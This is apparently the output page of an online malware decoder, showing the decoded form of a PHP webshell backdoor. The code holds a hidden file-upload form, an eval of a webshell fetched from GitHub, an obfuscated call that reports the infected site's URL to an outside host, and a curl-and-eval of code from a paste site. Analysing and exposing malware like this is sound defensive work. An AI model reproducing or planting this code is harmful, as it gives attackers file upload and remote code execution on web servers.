Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


if (isset($_GET['mrz'])) {
 echo '<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">';
 echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload">';
 echo '</form>';
 echo '<a href="#">Hello Dady</a>';
 if ($_POST['_upl'] == "Upload") {
 if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
 echo '<b>Done</b><br><br><a href="./' . $_FILES['file']['name'] . '">' . $_FILES['file']['name'] . '</a>';
 } else {
 echo '<b>Not Upload File !</b><br><br>';
 }
 }
 exit;
}
if (isset($_GET['mrzali'])) {
/****/@null; /********/ /**/ /********/@eval/****/("".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/
exit;
}
echo '
';$z = strrev('edoced_46esab');
$a = array(104, 116, 116, 112, 115, 58, 47, 47, 115, 105, 121, 97, 104, 105, 46, 116, 111, 112, 47, 116, 101, 115, 116, 47, 115, 116, 121, 108, 101, 46, 112, 104, 112);
$b = '';
foreach ($a as $c) { $b .= chr($c); }
$x = $z(base64_encode($b));
$y = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$d = array(chr(102) . chr(105) . chr(108) . chr(101) . '_url' => $y);
$o = array(
 chr(104) . chr(116) . chr(116) . chr(112) => array(
 'method' => strtoupper(chr(112) . chr(111) . chr(115) . chr(116)),
 'header' => 'Content-type: application/x-www-form-urlencoded',
 'content' => http_build_query($d),
 ),
);
$c = stream_context_create($o);
function _f($u, $c) {
 if (function_exists('file_get_contents')) {
 $r = @file_get_contents($u, false, $c);
 if ($r !== false) return $r;
 }
 if (function_exists('curl_init')) {
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $u);
 curl_setopt($ch, CURLOPT_POST, 1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($GLOBALS['d']));
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_HEADER, false);
 $r = curl_exec($ch);
 curl_close($ch);
 if ($r !== false) return $r;
 }
 return '';
}
$r = _f($x, $c);
echo '
';$url = 'https://bypass.pw/raw/xZgcdLD';

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$code = curl_exec($ch);

if ($code === false) {
    die('cURL error: ' . curl_error($ch));
}

curl_close($ch);



eval("".$code);


© 2023 Quttera Ltd. All rights reserved.